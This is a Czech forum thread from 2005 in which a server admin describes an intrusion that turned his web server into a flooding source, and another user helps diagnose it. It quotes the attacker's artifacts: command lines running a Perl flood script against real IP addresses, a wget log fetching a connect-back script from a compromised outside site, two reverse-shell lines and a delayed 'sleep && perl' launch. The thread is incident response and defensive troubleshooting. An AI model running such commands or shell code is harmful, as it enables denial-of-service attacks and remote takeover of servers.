Průnik do webserveru :(

Zdravím, dneska jsme zaznamenali problém s počtem odeslaných paketů z našeho webserveru. Výpisem procesů jsem zjistil, že se spustili perlovské skritpy, které posílají cca 8000paketů/s na určitou ip adresu na port 80.

ps ax -vypadal takto:
sh -c cd /tmp;perl sbyte.t 67.43.159.2 80 99999999999 0 2>&1

sh -c cd /tmp;perl sbyte.t 72.20.3.74 80 99999999999 16 2>&1

... z logů jsem zjistil, že byl tento(a ještě 3 další) nakopírovány z ip 195.213.50.200

výpis logu apache
--11:20:39-- http://www.asf.toscana.it/tmp/conback.pl => `conback.pl'

Resolving www.asf.toscana.it... 159.213.50.200

Connecting to www.asf.toscana.it[159.213.50.200]:80... connected.

HTTP request sent, awaiting response... 200 OK Length: 1,100 [text/x-perl]
OK . 100% 10.49 MB/s
11:20:39 (10.49 MB/s) - `conback.pl' saved [1100/1100]
-toto mi příjde, jako stažení pomocí wget. Nic víc jsem z logů nenašel,,, Pomocí ssh se na server nepřihlásil.

Netušíte, kudy mohl útočník nahrát tyto skripty a hlavně jak je spustil??? Celkem by nám pomotal hlavu, kdyby nechal smazat celý adresář /var/www :(

Nicmene pochybuji, ze panum fungoval ten bindshell ;), kdyz v conback.pl maji toto:

open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");

29.8.2005 19:10 Rover | skóre: 10
Rozbalit Rozbalit vše Re: Průnik do webserveru :(

Tak koukám, že někdo opravdu už toto viděl a zažil....

kdybyste chtěli, dám skripty conback.pl a sbyte.t k nahlédnutí...

--Nejvíce by mě zajímalo, jak to tam dostali a jak to spustili? Ihned jsem aktualizoval Apache i perlové věcičky...

29.8.2005 19:41 petr_p
Rozbalit Rozbalit vše Re: Průnik do webserveru :(

Ne, nezazil ani nevidel (vlaste jednou ano, ale to byl cizi stroj, kde bylo _velmi_ slabe heslo).

Ten connback.pl jsem vytahnul z URL ve vasem postu. Nicmene sbyte.t by me zajimal. Podle popisu to vypada na DDoS utok.

Kudy se tam dosali? Na to jste poskytnul malo informaci. Existuji v zasade dve moznosti. Bud vyuzili nejakou chybu typu buffer overflow v nejake webove aplikaci (pak ale ta aplikace musela byt dostatecne znama -- napr. phpBB).

Nebo a to bych videl jako pravdepodobnejsi, mate chybu ve vasich perlovych skriptech (napr. escapovany shellovy prikaz ve zpetnych apostofech ze vstupu -- BTW, pouzivate tainted modul?). Na to by ukazoval vystup, ktery jste nasel v httpd logu -- stderr vystup vaseho skriptu, ktery spustil wget. Byl to vas skript (apache hlasi nazev skriptu, ktery produkuje chybovy vystup)?

29.8.2005 20:07 Rover | skóre: 10
Rozbalit Rozbalit vše Re: Průnik do webserveru :(

DoS útok to je na 100% akorát, že náš server byl využit jako hostitelský stroj, ze kterého útok byl páchán.

Moc se bohužel v typech průniků nevyznám. V logu u toho překopírování nic jiného není. Třeba náznak který skript to byl -opravdu nic. Perlové skripty používám málokdy. Vlastní přístupné z webu nemám, pouze ty komerční (cricket,smokeping...), ale ty počítám že zásadní chybu ve skriptu nemají.

Z modulů apache používám: config_log_module, mime_module, negotiation_module, status_module, includes_module, autoindex_module, dir_module, cgi_module, speling_module, userdir_module, alias_module, rewrite_module, access_module, auth_module, expires_module, unique_id_module, setenvif_module, dav_module, php4_module

pokuď máte zájem o ten druhý sbyte.t skript, dejte mi mailovku -pošlu Vám to. (teda pokuď to neobrátíte proti mě :) )

29.8.2005 20:28 petr_p
Rozbalit Rozbalit vše Re: Průnik do webserveru :(

Za ten log se omlouvam, ted jsem si to overoval, a apache do error_logu opravdu (defaulne) nepise nazev skriptu, ktery neco vypoti na stderr. Kazdopadne jsem tam videl u vas cas. Podivejte se do access_logu na stejny cas. Najdete te tam vsechny http pozadavky, takze i nazvy skriptu, ktere byly pres HTTP volany.

Tim tainted modulem jsem myslel perlovsky modul, ktery dokaze hlidat pohyb dat po skriptu a napr. odmine spustit prikaz, ktery pochazi ze vstupu od uzivatele.

Kazdopadne, pokud nenajdete bezpecnosti chybu, doporucuji uktualizovat veskery sofwtare, ktery je volan z webovych skriptu a stroj po nejakou dobu hlidat. Pripadne napiste spravcovi site, ze ktere jste byl hacknut (pokud na to prijdete), protoze pravdepodobne i on byl kompromitovan.

29.8.2005 20:45 Rover | skóre: 10
Rozbalit Rozbalit vše Re: Průnik do webserveru :(

Do access_logu jsem se už díval a žádný skript v tu dobu se nezpouštěl... to vypadá, že se nedostal přes web server :/ ... dále jsem zjistil z výpisu služeb, že byl spuštěn "časovač" - už si to přesně nepamatuji ale něco jako "sleep 9999999 && perl sbyte.t IP.add.rre.sa 999999999 80 &" to znamená, že se to mohlo spustit o několik hodin později.... a být zapsáno do logu někdy kdysi před pár dny :/

Dotaz: Průnik do webserveru :(

Odpovědi